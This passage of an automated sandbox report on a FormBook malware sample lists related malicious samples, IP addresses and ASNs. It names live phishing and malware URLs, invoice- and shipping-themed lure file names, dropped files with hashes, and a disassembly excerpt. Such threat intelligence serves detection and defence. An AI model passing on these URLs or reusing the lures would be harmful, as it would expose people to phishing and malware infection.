	COTIZACION 290824.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	Scan_000019921929240724_PDA _ SOA_Payment Reference TR-37827392-2024-08-29.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	COMMERCAIL INVOICE AND AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	DHL AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	Pedido De Compra OC 4504 19082024 De Grupoeld SAS.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	Udspecialiser45.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.70.184.50
	qEW7hMvyV7.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	z1PEDIDODECOMPRAURGENTE.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	z2AMOSTRAS.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
www.elsupertodo.net	COTIZACION 290824.exe	Get hash	malicious	FormBook	Browse	148.72.152.174
www.elsupertodo.net	COTIZACION 280824.exe	Get hash	malicious	FormBook	Browse	148.72.152.174

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	file.exe	Get hash	malicious	Unknown	Browse	52.222.236.48
	file.exe	Get hash	malicious	Unknown	Browse	52.222.236.80
	https://app.edu.buncee.com/buncee/67041126b8c5429abf86de62d6aaa0d9	Get hash	malicious	Unknown	Browse	18.223.207.53
	https://adobeadpjlkjdnldjddlkw.s3.us-west-1.amazonaws.com/adobescanner0987890.html	Get hash	malicious	Unknown	Browse	3.5.160.124
	file.exe	Get hash	malicious	Unknown	Browse	52.222.236.120
	SecuriteInfo.com.Win32.CrypterX-gen.29913.30159.exe	Get hash	malicious	FormBook	Browse	3.64.163.50
	file.exe	Get hash	malicious	Unknown	Browse	52.222.236.80
	file.exe	Get hash	malicious	Unknown	Browse	52.222.236.120
	file.exe	Get hash	malicious	Unknown	Browse	52.222.236.80
	https://docsend.com/view/s/g9wy7hdqt2mwawpc	Get hash	malicious	Unknown	Browse	99.86.1.146
HOSTNETNL	DEBIT NOTE July 2024 PART 2.exe	Get hash	malicious	FormBook	Browse	91.184.0.200
	COTIZACION 290824.exe	Get hash	malicious	FormBook	Browse	91.184.0.200
	ORDER_pdf.exe	Get hash	malicious	FormBook	Browse	91.184.0.200
	GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exe	Get hash	malicious	FormBook	Browse	91.184.0.200
	bintoday1.exe	Get hash	malicious	FormBook	Browse	91.184.0.200
	ORDER_38746_pdf.exe	Get hash	malicious	FormBook	Browse	91.184.0.200
	z1PEDIDODECOMPRAURGENTE.exe	Get hash	malicious	FormBook	Browse	91.184.0.111
	z2AMOSTRAS.exe	Get hash	malicious	FormBook	Browse	91.184.0.111
	#U0417#U0410#U041f#U0420#U041e#U0421.exe	Get hash	malicious	FormBook	Browse	91.184.0.111
	#U0417#U0410#U041f#U0420#U041e#U0421.exe	Get hash	malicious	FormBook	Browse	91.184.0.111
NAMECHEAP-NETUS	https://ueirecsue-f8cdcf.ingress-daribow.ewp.live/wp-content/plugins/esidem/pages/region.php	Get hash	malicious	Unknown	Browse	63.250.43.13
	http://b5jgzxk1xq.c-calmshoe.shop	Get hash	malicious	EvilProxy	Browse	162.0.225.117
	DO9uvdGMde.exe	Get hash	malicious	AgentTesla	Browse	198.54.122.135
	https://www.google.com/url?q=https://google.com/url?hl%3Den%26q%3Dhttps://google.com/url?q%3DJFt7SBpfnkz37NXTPycl%26rct%3DecYm4gDyqlWjNVTtaSh7%26sa%3Dt%26esrc%3DyN3TRjFzCWurgbW1vOG4%26source%3DzcMGnUNgngXYWBYW2c3r%26cd%3DqBH0Ch4Gn8VGtKfHcUPR%26cad%3D0q4c3js52qUrSH6rI5Ux%26ved%3DxpZpiH8kwVo72kkPvwUH%26uact%3DhzYhur4iRKYoiuCfwC6s%26url%3Damp%252Fareaazul.com.mx%252F.beans%252F&source=gmail&ust=1725454484963000&usg=AOvVaw2xy0LT_ByjSLCoEqCzpyxV#e3YsAE-SURELILYZmFiM3NtcF9wY0BnbG9iYWxmb3VuZHJpZXMuY29t	Get hash	malicious	HTMLPhisher	Browse	198.54.114.158
	https://urlz.fr/rXqt	Get hash	malicious	Unknown	Browse	63.250.43.13
	https://fvrihg-f42780.ingress-daribow.ewp.live/wp-content/plugins/sdnww/pages/region.php	Get hash	malicious	Unknown	Browse	63.250.43.14
	https://www.facebook-web.qatara.org/	Get hash	malicious	Unknown	Browse	199.188.200.104
	https://facebook-web.qatara.org/	Get hash	malicious	Unknown	Browse	199.188.200.104
	https://urlz.fr/rYuE	Get hash	malicious	Unknown	Browse	63.250.43.129
	https://ventra-f1bc7c.ingress-earth.ewp.live/wp-content/plugins/nwcalink/pages/region.php	Get hash	malicious	Unknown	Browse	63.250.43.129
LINODE-APLinodeLLCUS	https://ecom.bio/88bmwbm?gad_source=1&gclid=Cj0KCQjwiuC2BhDSARIsALOVfBJ293HpuZvtJvhD8kPzmEW6CdE9kLYMBSVdTvNfgfsL__VlxT7t4s4aAiVuEALw_wcB	Get hash	malicious	Unknown	Browse	45.79.23.204
	SecuriteInfo.com.Script.SNH-gen.5224.29912.exe	Get hash	malicious	FormBook	Browse	45.79.19.196
	https://bankcbnincoming.technicafundamenta.com/	Get hash	malicious	HTMLPhisher	Browse	104.237.131.152
	http://readabilityscore.com	Get hash	malicious	Unknown	Browse	45.79.244.209
	http://hidelink.net/y7vrjsixlt	Get hash	malicious	Unknown	Browse	172.105.56.238
	PDPUOIE76867 PDF.exe	Get hash	malicious	FormBook	Browse	96.126.123.244
	147.182.187.19-mips-2024-09-04T14_22_15.elf	Get hash	malicious	Unknown	Browse	139.162.228.150
	http://www.conchtech.com/	Get hash	malicious	Unknown	Browse	172.105.53.250
	https://static.rock.so/file/mAm512rA~/mAm512rA/2d214e336544c4cd0b1aaafcfffd0f29/HarringtonElectric.pdf	Get hash	malicious	Unknown	Browse	45.79.71.250
	p4LNUqyKZM.exe	Get hash	malicious	FormBook	Browse	45.33.2.79

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\sqlite3.dll	https://downloads.linktek.com/LR/SetupLinkReporter.zip	Get hash	malicious	Unknown	Browse
	9jO1Dp6gDT.rtf	Get hash	malicious	FormBook	Browse
	lrShdpqqbi.rtf	Get hash	malicious	FormBook	Browse
	HSBC_Customer_Information.xls	Get hash	malicious	FormBook	Browse
	BEM00263.docx	Get hash	malicious	FormBook	Browse
	602_Shipping_instruction.xls	Get hash	malicious	FormBook	Browse
	P.O._102176_GERGONNE_ECUADO.xls	Get hash	malicious	FormBook	Browse
	urgent+order.docx	Get hash	malicious	FormBook	Browse
	NEW ORDER.xls	Get hash	malicious	FormBook	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3360000[1].zip

Download File

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	555897
Entropy (8bit):	7.998798883269043
Encrypted:	true
SSDEEP:	12288:HrVIJYS55B72YeuYJxZk62xr4Tl0n5xAfy0hnTJW:x+55B7NqxZk62x8xIavh8
MD5:	A9A3B70ADCF65BE80C9B00E65D158669
SHA1:	F2149444F70B702A43AD1E058DEA147D6BA2EB5D
SHA-256:	BDCD90D909C708EFF9A829C01B428C2B24FAFC15F63DECCD064C2BB12B0A49E3
SHA-512:	E06EA8F9D982ECD5BEDF23676FA41B49D8673D9135F752655210C322529FB1441A4EF5F292825EEA11CCB0CB516E873C33D16C3F800204511639C5B8DB429290
Malicious:	false
Reputation:	low
Preview:	PK...........R...Vl...........sqlite3.defUT......`...`ux..................&...}.$=9}....v...F21...o;O.A`1.(].\|#`.............Jz.2.u.....d....J.&<x3....4....a...........V.#g..M`.....a/L.y...[..W.f.F..I:o.u?...d.Vl..V6....P.o%389X..^.....j.....~.5......a\|yp.M.8...9. ._=,./(..p.zV...z...........7..+...1..\|....'.AAQ.J4<z...n...4$..;...w....e.....#..$....(9u....%.@Gr?.u.,....x._...B...8F....l...y......%Yo?..,(...?.p.`.`G....UJx<.j.a.......i.#.y8.m...2....@.Y4....g....m..;=x..T.j. .aO.f..U.;.Q......(.N/....\|.....6.1w.v.0...c..!....m....L+..6...<.@^$....!..K....1/H..u...<.7....%.I63.v).v>..C.G....Q......CX...q.....H..)7:..... .'.....%.$.Q...`3.I0..PBE.Qa...*..X..0[.gk..nt.e.. ...p.9Y......[.&._..uK...i.h%......?8..53...\P1C.d...G..F1.7.<......i+x0.S.X...L..B'Zc..UT...~F...:c6...?..R......>(... .K..l...{.......p.{K...)[.........<d.H%GT.......F..C...Se...Rf..d....N...&..C..?.X@.v..ZJ.QS..=TJ..."1v^.B....'! .Y...b.V...q....8.c.Mv..G.0r.6w.xc..M.:..

C:\Users\user\AppData\Local\Temp\01194HH4

Download File

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	1.0714656887192844
Encrypted:	false
SSDEEP:	96:LSe7mlcwilGc7Ha3f+uG01YLvqAogv5KzzUG+Qk/BuqBFzsCWo3qkrH1VumgXn:LscflGwucCaM0f6kL1Vumi
MD5:	9867F6F82F226DE748557B47C82BE25D
SHA1:	B10DE25FA81662E082C60C8700E348C19AE7404B
SHA-256:	CCB153269D92EC65916497E01D0E63A4A61767603EBB226FFD35DCC983B62A55
SHA-512:	25917CB9C6632DB1F75C80CC6D64077EF742F6A6F2134DAB7D8DEFEB4DA10040A91B98A03560DDBF6A096E2ADC8CF496902E54877665B9E1C5542397C889E214
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4zh4wl.zip

Download File

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	190
Entropy (8bit):	4.925430111141133
Encrypted:	false
SSDEEP:	3:qVZxgROAyR0e0qHXbvx9McfwF0GFS77uR2mkBJJULZIshcFXFAIuJFXhXWNqD:qzxUeR0eRHXLxytcugHlyczGbeqD
MD5:	D465F70643E81EDB6D4E0D2C1BEF0D55
SHA1:	2EB61753437FAC46AF7025A9789A2CDC17E1EDBA
SHA-256:	10425A1A46042E745C1246B6F8B007AE120BF2DD22423702BD3DBF554D6A5DD0
SHA-512:	F4CA517C6FB475CF0F80311484236820BB1A05E584B1C41B1D869A439609DD259D294E8D81860E7E1330B6C10B85683DB9D1F184FE2B8B69B9B1F41EFEA83BFF
Malicious:	false
Reputation:	low
Preview:	<html><head><title lineno="380">Not Found</title></head>.<body><h1>Document Not Found</h1>.The document /2022/sqlite-dll-win32-x86-3370000.zip is not available on this server.</body></html>.

C:\Users\user\AppData\Local\Temp\aut2617.tmp

Download File

Process:	C:\Users\user\Desktop\PO #86637.exe
File Type:	data
Category:	dropped
Size (bytes):	286720
Entropy (8bit):	7.991764203619874
Encrypted:	true
SSDEEP:	6144:4BEU3MTl5wG4bIhBmnP7LyCAcEPFoq+2ulo+JpWXSWaMMtn37MnqjqqIAW9:4K55bzBmP6CAcEtPul/WaMMyqjs
MD5:	645AC94B2F4269E43BA7A1A0BCB5BB5A
SHA1:	50CA6F23A5ACB86A704CDAE1DA4DB57BCDE93A56
SHA-256:	E078BA461D773B6BC4CF8CF932FF20C2D76AE7D458E6689264B19008B73B5991
SHA-512:	62E6801CF30B22CF10960974E54FB17FD275AC99B020DE7559118B2E1F91839D47CB1C898904B3C6633231C1FECEAB8B87A0DCFDBD0175B5AF87ED331C90C3EE
Malicious:	false
Reputation:	low
Preview:	x..g.23FO`.<...p.LJ....EG..565LYL5LI5F23FO8XA565LYL5LI5F2.FO8V^.85.P...Hy..g.&Kx1GYR>8!./([(]Gf-]x3@X.%7lq...+]W#a5UK.65LYL5L04O..&(.e!R..,>./...\|RT.U...VR.C.uU!.a/,Pe!R.5LYL5LI5.w3F.9YA....YL5LI5F2.FM9S@>65.]L5LI5F23F_,XA5&5LY,1LI5.23VO8XC563LYL5LI5@23FO8XA5V1LYN5LI5F21F..XA%65\YL5LY5F"3FO8XA%65LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL.8,M223F+t\A5&5LY.1LI%F23FO8XA565LYL.LIUF23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8

C:\Users\user\AppData\Local\Temp\aut2657.tmp

Download File

Process:	C:\Users\user\Desktop\PO #86637.exe
File Type:	data
Category:	dropped
Size (bytes):	15506
Entropy (8bit):	7.630062108705077
Encrypted:	false
SSDEEP:	384:R6fLPWiplg6oT9L7qhuklidJCqRd4YUaIbA5PGGY:4WiplgxL+jlk34i4ANW
MD5:	7C680338435B9830920D7178DCC3A2B7
SHA1:	BBD06BBBED660F52D16A2A9353C878F9F2E11F16
SHA-256:	1AAE0A4D3B1CA171FD3046A2AD157B1EC223E5FC5904D8CBDDFC2DE7A87ADBDA
SHA-512:	967997F6C7629EA1DDB17A3E634C0850920483262E64260C27218238174EC78A059C763C5F472F922913957BCA170B0FC02F716C64C558AD976E5B33EEBEF709
Malicious:	false
Preview:	EA06......3...`.....>&........ .\|Y@..c...& ..8.?.....w.....;.l...M.!~.....b.T.@.....?......>&...<......P............. .........}.P...........^.y........Y@^.y..?.....N@.>....f......\|3../.....;...P..h...M.^..Y....c.z..g.^..T.......l`.....C..L..g.............@...B.............{./..T\|....,.#./..., ?....G.P...X.~?.)..G.\.Q..@~?....\........P.............PT..,......s`[..fj.q..Y.k.y.....Y....k.p.o....]...@.....=...\|.t...6{.....l.;.8]7.{d.......(....M...@x...o.j."...A...R..%a.v.. .?=.......&.....D.)[......,............+..@..........+..S.s......... ._.@...6....&.........5....f.....l..m7.@...g...z..`.).L.A....k..6....?...k.......C]?Y....k6.z.. /_..k........}..I..r...............y....\|6 .O.F.......?.P..h.}..X..?Y....k8....C.....{c.Q..l}.Y_...{c.......1.f)Y....>.[....=....^..Q.......z..0[....K.....>{0{g.d.$.f...=.h...\|.1....3........8....i.X..?..'.9...&...=.u...4......u.9...4.....=......2\|..........\|...O..ow......0.O.........s.\|..#...... M..<......7.AS...

C:\Users\user\AppData\Local\Temp\croc

Download File

Process:	C:\Users\user\Desktop\PO #86637.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	200730
Entropy (8bit):	2.806307572182879
Encrypted:	false
SSDEEP:	24:2qkzQQzB+zKXA2zV/jj5aFTkjD5/a8wEEw+zzjaawgzz1QAwRzgdSgK+6eaSz/Ke:3
MD5:	7AEACEFED2328503E6B8B062CE232188
SHA1:	4A06D5FAEBAA8211CCB21B83BFA2BA95F87189A7
SHA-256:	F0212DB0573872705FA456E28A1FDD62D73591547562F8A4AB117A06DB00232F
SHA-512:	95A333DB112BEFA404144611C864A9881A1D50C20214E107AA936429907BAE6536E0A68A1BB2C274C774462A042679A9F9887BE6973DD8A660A748B7D4EB4952
Malicious:	false
Preview:	3690AA03690AAx3690AA53690AA53690AA83690AAb3690AAe3690AAc3690AA83690AA13690AAe3690AAc3690AAc3690AAc3690AA03690AA23690AA03690AA03690AA03690AA03690AA53690AA63690AA53690AA73690AAb3690AA83690AA63690AAb3690AA03690AA03690AA03690AA03690AA03690AA03690AA63690AA63690AA83690AA93690AA43690AA53690AA83690AA43690AAb3690AA93690AA63690AA53690AA03690AA03690AA03690AA03690AA03690AA03690AA63690AA63690AA83690AA93690AA43690AAd3690AA83690AA63690AAb3690AAa3690AA73690AA23690AA03690AA03690AA03690AA03690AA03690AA03690AA63690AA63690AA83690AA93690AA53690AA53690AA83690AA83690AAb3690AA83690AA63690AAe3690AA03690AA03690AA03690AA03690AA03690AA03690AA63690AA63690AA83690AA93690AA43690AA53690AA83690AAa3690AAb3690AA93690AA63690AA53690AA03690AA03690AA03690AA03690AA03690AA03690AA63690AA63690AA83690AA93690AA43690AAd3690AA83690AAc3690AAb3690AAa3690AA63690AAc3690AA03690AA03690AA03690AA03690AA03690AA03690AA63690AA63690AA83690AA93690AA53690AA53690AA83690AAe3690AAb3690AA83690AA33690AA33690AA03690AA03690AA03690AA03690AA03690AA03690AA

C:\Users\user\AppData\Local\Temp\disimmure

Download File

Process:	C:\Users\user\Desktop\PO #86637.exe
File Type:	data
Category:	dropped
Size (bytes):	286720
Entropy (8bit):	7.991764203619874
Encrypted:	true
SSDEEP:	6144:4BEU3MTl5wG4bIhBmnP7LyCAcEPFoq+2ulo+JpWXSWaMMtn37MnqjqqIAW9:4K55bzBmP6CAcEtPul/WaMMyqjs
MD5:	645AC94B2F4269E43BA7A1A0BCB5BB5A
SHA1:	50CA6F23A5ACB86A704CDAE1DA4DB57BCDE93A56
SHA-256:	E078BA461D773B6BC4CF8CF932FF20C2D76AE7D458E6689264B19008B73B5991
SHA-512:	62E6801CF30B22CF10960974E54FB17FD275AC99B020DE7559118B2E1F91839D47CB1C898904B3C6633231C1FECEAB8B87A0DCFDBD0175B5AF87ED331C90C3EE
Malicious:	false
Preview:	x..g.23FO`.<...p.LJ....EG..565LYL5LI5F23FO8XA565LYL5LI5F2.FO8V^.85.P...Hy..g.&Kx1GYR>8!./([(]Gf-]x3@X.%7lq...+]W#a5UK.65LYL5L04O..&(.e!R..,>./...\|RT.U...VR.C.uU!.a/,Pe!R.5LYL5LI5.w3F.9YA....YL5LI5F2.FM9S@>65.]L5LI5F23F_,XA5&5LY,1LI5.23VO8XC563LYL5LI5@23FO8XA5V1LYN5LI5F21F..XA%65\YL5LY5F"3FO8XA%65LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL.8,M223F+t\A5&5LY.1LI%F23FO8XA565LYL.LIUF23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8XA565LYL5LI5F23FO8

C:\Users\user\AppData\Local\Temp\sqlite3.def

Download File

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	7174
Entropy (8bit):	4.350979914765137
Encrypted:	false
SSDEEP:	96:GcuN/mwU+anR+7GgbqXdMcAM3K4tGvAF+GEhwIOVtvaENw+Y0aR:E/8+7GgbqbKWrF+GEebvaENw+cR
MD5:	88B78A6F643D3341AE9BF96D5816F1C2
SHA1:	66D8BB79C945396FFBEA9A272CA5BAEE0EEECF2A
SHA-256:	8CA12E8B973A1974E160AE2E55F2B59870314DF159BA2DC54C7349ACEE176EBE
SHA-512:	51166B6A0109BC003416BCD36EAB541B242EE9657CBA0876C6F5CBC62724E0C1BB1317317ED4121871380DE1B441D82A5954E0AEFE8DD532F2C46FF414E4D678
Malicious:	false
Preview:	EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3changegroup_add.sqlite3changegroup_add_strm.sqlite3changegroup_delete.sqlite3changegroup_new.sqlite3changegroup_output.sqlite3changegroup_output_strm.sqlite3_changes.sqlite3changeset_apply.sqlite3changeset_apply_strm.sqlite3changeset_apply_v2.sqlite3changeset_apply_v2_strm

C:\Users\user\AppData\Local\Temp\sqlite3.dll

Download File

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1079909
Entropy (8bit):	6.4975516368338315
Encrypted:	false
SSDEEP:	24576:FRwXVREXm6CX7FgiX+y3sxroF/Ktlne05qj7:BmTXhznqroFYlno
MD5:	CE5C15B5092877974D5B6476AD1CB2D7
SHA1:	76A6FC307D1524081CBA1886D312DF97C9DD658F
SHA-256:	1F1A186EA26BD2462EA2A9CF35A816B92CAF0897FDF332AF3A61569E0BA97B24
SHA-512:	BB9CED38C63D2A29E18C38F60020CFDF0161384CD4AD6328352626643BECDF49F6B4BEF47012391720344FDD8AD520AA802DCBBED15B5026D27EB93B0A839C90
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: 9jO1Dp6gDT.rtf, Detection: malicious, Browse Filename: lrShdpqqbi.rtf, Detection: malicious, Browse Filename: HSBC_Customer_Information.xls, Detection: malicious, Browse Filename: BEM00263.docx, Detection: malicious, Browse Filename: 602_Shipping_instruction.xls, Detection: malicious, Browse Filename: P.O._102176_GERGONNE_ECUADO.xls, Detection: malicious, Browse Filename: urgent+order.docx, Detection: malicious, Browse Filename: NEW ORDER.xls, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.2.........!...............................a.......................................... ......................p..T)......................................L:...................................................................................text...............................`.P`.data....#.......$..................@.`..rdata...=... ...>..................@.`@.bss....(....`........................`..edata..T)...p...*...>..............@.0@.idata...............h..............@.0..CRT....,............v..............@.0..tls.... ............x..............@.0..rsrc................z..............@.0..reloc..L:.......<..................@.0B/4......8.... ......................@.@B/19.....R....0......................@..B/31.....]'.......(..................@..B/45......-...0......................@..B/57.....\....`......................@.0B/70.....#....p..........

C:\Users\user\AppData\Local\Temp\udapmlz.zip

Download File

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	555897
Entropy (8bit):	7.998798883269043
Encrypted:	true
SSDEEP:	12288:HrVIJYS55B72YeuYJxZk62xr4Tl0n5xAfy0hnTJW:x+55B7NqxZk62x8xIavh8
MD5:	A9A3B70ADCF65BE80C9B00E65D158669
SHA1:	F2149444F70B702A43AD1E058DEA147D6BA2EB5D
SHA-256:	BDCD90D909C708EFF9A829C01B428C2B24FAFC15F63DECCD064C2BB12B0A49E3
SHA-512:	E06EA8F9D982ECD5BEDF23676FA41B49D8673D9135F752655210C322529FB1441A4EF5F292825EEA11CCB0CB516E873C33D16C3F800204511639C5B8DB429290
Malicious:	false
Preview:	PK...........R...Vl...........sqlite3.defUT......`...`ux..................&...}.$=9}....v...F21...o;O.A`1.(].\|#`.............Jz.2.u.....d....J.&<x3....4....a...........V.#g..M`.....a/L.y...[..W.f.F..I:o.u?...d.Vl..V6....P.o%389X..^.....j.....~.5......a\|yp.M.8...9. ._=,./(..p.zV...z...........7..+...1..\|....'.AAQ.J4<z...n...4$..;...w....e.....#..$....(9u....%.@Gr?.u.,....x._...B...8F....l...y......%Yo?..,(...?.p.`.`G....UJx<.j.a.......i.#.y8.m...2....@.Y4....g....m..;=x..T.j. .aO.f..U.;.Q......(.N/....\|.....6.1w.v.0...c..!....m....L+..6...<.@^$....!..K....1/H..u...<.7....%.I63.v).v>..C.G....Q......CX...q.....H..)7:..... .'.....%.$.Q...`3.I0..PBE.Qa...*..X..0[.gk..nt.e.. ...p.9Y......[.&._..uK...i.h%......?8..53...\P1C.d...G..F1.7.<......i+x0.S.X...L..B'Zc..UT...~F...:c6...?..R......>(... .K..l...{.......p.{K...)[.........<d.H%GT.......F..C...Se...Rf..d....N...&..C..?.X@.v..ZJ.QS..=TJ..."1v^.B....'! .Y...b.V...q....8.c.Mv..G.0r.6w.xc..M.:..

C:\Users\user\AppData\Local\Temp\wtypr.zip

Download File

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	190
Entropy (8bit):	4.925430111141133
Encrypted:	false
SSDEEP:	3:qVZxgROAyR0e0qHXbvx9McfwF0GFS77uR2mkBJJULZIshcFXFAIuJFXhXWNqD:qzxUeR0eRHXLxytcugHlyczGbeqD
MD5:	D465F70643E81EDB6D4E0D2C1BEF0D55
SHA1:	2EB61753437FAC46AF7025A9789A2CDC17E1EDBA
SHA-256:	10425A1A46042E745C1246B6F8B007AE120BF2DD22423702BD3DBF554D6A5DD0
SHA-512:	F4CA517C6FB475CF0F80311484236820BB1A05E584B1C41B1D869A439609DD259D294E8D81860E7E1330B6C10B85683DB9D1F184FE2B8B69B9B1F41EFEA83BFF
Malicious:	false
Preview:	<html><head><title lineno="380">Not Found</title></head>.<body><h1>Document Not Found</h1>.The document /2022/sqlite-dll-win32-x86-3370000.zip is not available on this server.</body></html>.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.141827300346818
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PO #86637.exe
File size:	1'190'400 bytes
MD5:	d14ac19303ac82dd9370e6e3277ef1c6
SHA1:	6217e9a7218cfbbe315aa8d631558f5febb3139b
SHA256:	ac32edc4349871fa356f2bd55ce445b89f20b25f6792596fcf134cba4163585e
SHA512:	fffca8315260b4c86ad4f7a48b88d90557975cdaa7e6c1022c96caaa24f65597489803f821ba3706c0900de07d69f06e384f56a719fd8186eb660f8bebc32fe1
SSDEEP:	24576:vAHnh+eWsN3skA4RV1Hom2KXMmHaPMLQhufvlvkkMJf4x/Z5:Sh+ZkldoPK8YaPML0KvkNab
TLSH:	B045BD0273D5C036FFABA2739B6AF64156BC79254133852F13982DB9BC701B2263D663
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66D8ED15 [Wed Sep 4 23:28:21 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F4324F2581Dh
jmp 00007F4324F185D4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F4324F1875Ah
cmp edi, eax
jc 00007F4324F18ABEh
bt dword ptr [004C41FCh], 01h
jnc 00007F4324F18759h
rep movsb
jmp 00007F4324F18A6Ch
cmp ecx, 00000080h
jc 00007F4324F18924h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
